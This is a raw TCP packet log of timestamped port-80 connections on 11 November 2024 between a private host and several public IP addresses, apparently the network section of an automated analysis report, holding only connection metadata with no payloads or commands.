Nov 11, 2024 08:33:48.382100105 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.382159948 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.382164955 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.382167101 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.382167101 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.382220030 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.382345915 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.382407904 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.382491112 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.387018919 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.387025118 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.387031078 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.387036085 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.387085915 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.387188911 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.436923027 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.436928988 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.437030077 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.463195086 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.463202000 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.463216066 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.463222980 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.463233948 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.463269949 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.463340998 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.463485003 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.463534117 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.463545084 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.463584900 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.463859081 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.463908911 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.463915110 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.463926077 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.464011908 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.464479923 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.464485884 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.464498997 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.464528084 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.464533091 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.464539051 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.464540005 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.464622021 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.465403080 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.465409040 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.465420961 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.465477943 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.511481047 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.511491060 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.511497021 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.511662960 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.518028975 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.518034935 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.518045902 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.518134117 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.544344902 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.544368029 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.544373035 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.544449091 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.544455051 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.544465065 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.544471979 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.544481039 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.544511080 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.544511080 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.544545889 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.544552088 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.544558048 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.544646025 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.545320034 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.545334101 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.545423985 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.545429945 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.545445919 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.545476913 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.545629025 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.545671940 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.545677900 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.545711040 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.545715094 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.545722008 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.545804024 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.546250105 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.546256065 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.546267986 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.546340942 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.546344042 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.546348095 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.546354055 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.546360970 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.546386003 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.546389103 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.546459913 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.547158003 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.547208071 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.547214031 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.547245026 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.547272921 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.547278881 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.547283888 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.547302008 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.547333002 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.547338009 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.547363997 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.547442913 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.548096895 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.548136950 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.548149109 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.548190117 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.548194885 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.548199892 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.548213959 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.548255920 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.592530012 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.592535019 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.592545986 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.592565060 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.592571020 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.592581987 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.592642069 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.592679024 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.599257946 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.599271059 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.599282026 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.599287033 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.599358082 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.599363089 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.599364996 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.599504948 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.625803947 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.625811100 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.625817060 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.625822067 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.625828028 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.625839949 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.625847101 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.625885963 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.625891924 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.625897884 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.625909090 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.625965118 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.625974894 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.625988007 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.626005888 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.626008034 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.626043081 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.626071930 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.626079082 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.626084089 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.626092911 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.626173019 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.626913071 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.626919031 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.626950026 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627037048 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627042055 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627063990 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.627099991 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627125025 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.627206087 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627212048 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627223015 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627228022 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627234936 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627285004 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.627397060 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.627672911 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627680063 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627691031 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627722979 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627727985 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627756119 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.627774954 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.627798080 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627804041 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627815008 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627876043 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627887011 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627892971 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.627899885 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.627955914 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.628557920 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.628563881 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.628576040 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.628582001 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.628664970 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.628670931 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.628678083 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.628709078 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.628720999 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.628724098 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.628731966 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.628741026 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.628746986 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.628798008 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.629297018 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.629373074 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.629427910 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.629435062 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.629522085 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.629528046 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.629539013 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.629539013 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.629548073 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.629568100 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:48.629584074 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.629584074 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.629621029 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.632385969 CET	50042	80	192.168.2.4	38.47.237.27
Nov 11, 2024 08:33:48.637317896 CET	80	50042	38.47.237.27	192.168.2.4
Nov 11, 2024 08:33:54.188543081 CET	50043	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:54.193588972 CET	80	50043	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:54.193905115 CET	50043	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:54.265187025 CET	50043	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:54.270093918 CET	80	50043	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:55.005606890 CET	80	50043	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:55.053184032 CET	50043	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:55.204668045 CET	80	50043	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:55.204730988 CET	50043	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:55.771502018 CET	50043	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:56.789911985 CET	50044	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:56.794815063 CET	80	50044	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:56.797270060 CET	50044	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:56.809185028 CET	50044	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:56.814096928 CET	80	50044	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:57.608122110 CET	80	50044	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:57.771421909 CET	50044	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:57.808612108 CET	80	50044	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:57.808660984 CET	50044	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:58.320445061 CET	50044	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:59.338449955 CET	50045	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:59.343436956 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:59.343502998 CET	50045	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:59.359472036 CET	50045	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:33:59.364389896 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:59.364406109 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:59.364423037 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:59.364433050 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:59.364511013 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:59.364525080 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:59.364562035 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:59.364571095 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:33:59.364581108 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:34:00.155982018 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:34:00.209199905 CET	50045	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:34:00.358115911 CET	80	50045	206.119.81.36	192.168.2.4
Nov 11, 2024 08:34:00.365190029 CET	50045	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:34:00.865818024 CET	50045	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:34:01.885387897 CET	50046	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:34:01.968565941 CET	80	50046	206.119.81.36	192.168.2.4
Nov 11, 2024 08:34:01.968661070 CET	50046	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:34:01.975527048 CET	50046	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:34:01.980659962 CET	80	50046	206.119.81.36	192.168.2.4
Nov 11, 2024 08:34:02.778789997 CET	80	50046	206.119.81.36	192.168.2.4
Nov 11, 2024 08:34:02.833928108 CET	50046	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:34:02.978051901 CET	80	50046	206.119.81.36	192.168.2.4
Nov 11, 2024 08:34:02.978153944 CET	50046	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:34:02.981188059 CET	50046	80	192.168.2.4	206.119.81.36
Nov 11, 2024 08:34:02.985922098 CET	80	50046	206.119.81.36	192.168.2.4
Nov 11, 2024 08:34:08.023133993 CET	50047	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:08.027988911 CET	80	50047	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:08.028072119 CET	50047	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:08.038638115 CET	50047	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:08.043512106 CET	80	50047	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:08.665965080 CET	80	50047	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:08.666076899 CET	80	50047	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:08.671334028 CET	50047	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:08.751934052 CET	80	50047	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:08.759450912 CET	50047	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:09.552918911 CET	50047	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:10.571450949 CET	50048	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:10.576351881 CET	80	50048	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:10.576535940 CET	50048	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:10.589210987 CET	50048	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:10.594063997 CET	80	50048	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:11.163604021 CET	80	50048	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:11.163623095 CET	80	50048	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:11.163664103 CET	50048	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:11.244414091 CET	80	50048	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:11.244458914 CET	50048	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:12.099652052 CET	50048	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:13.121220112 CET	50049	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:13.126142025 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.127643108 CET	50049	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:13.146527052 CET	50049	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:13.151424885 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.151436090 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.151449919 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.151458025 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.151525974 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.151566982 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.151576042 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.151582003 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.151592016 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.715614080 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.715629101 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.715732098 CET	50049	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:13.796689987 CET	80	50049	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:13.796735048 CET	50049	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:14.665199995 CET	50049	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:15.681953907 CET	50050	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:15.686989069 CET	80	50050	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:15.687057018 CET	50050	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:15.694300890 CET	50050	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:15.699086905 CET	80	50050	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:16.272221088 CET	80	50050	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:16.272233963 CET	80	50050	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:16.272378922 CET	50050	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:16.352838039 CET	80	50050	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:16.353339911 CET	50050	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:16.357201099 CET	50050	80	192.168.2.4	142.250.184.211
Nov 11, 2024 08:34:16.362040997 CET	80	50050	142.250.184.211	192.168.2.4
Nov 11, 2024 08:34:21.629466057 CET	50051	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:21.634351015 CET	80	50051	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:21.634411097 CET	50051	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:21.645126104 CET	50051	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:21.650053024 CET	80	50051	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:22.068794012 CET	80	50051	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:22.068857908 CET	50051	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:23.147233963 CET	50051	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:23.458965063 CET	50051	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:24.068336010 CET	50051	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:24.122407913 CET	80	50051	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:24.122423887 CET	80	50051	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:24.122427940 CET	80	50051	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:24.122500896 CET	50051	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:24.122567892 CET	50051	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:24.167215109 CET	50052	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:24.172053099 CET	80	50052	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:24.179351091 CET	50052	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:24.187303066 CET	50052	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:24.192116976 CET	80	50052	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:24.613491058 CET	80	50052	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:24.617759943 CET	50052	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:25.693485975 CET	50052	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:25.699143887 CET	80	50052	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:26.712006092 CET	50053	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:26.716964960 CET	80	50053	3.33.130.190	192.168.2.4
Nov 11, 2024 08:34:26.717272043 CET	50053	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:26.729247093 CET	50053	80	192.168.2.4	3.33.130.190
Nov 11, 2024 08:34:26.734201908 CET	80	50053	3.33.130.190	192.168.2.4
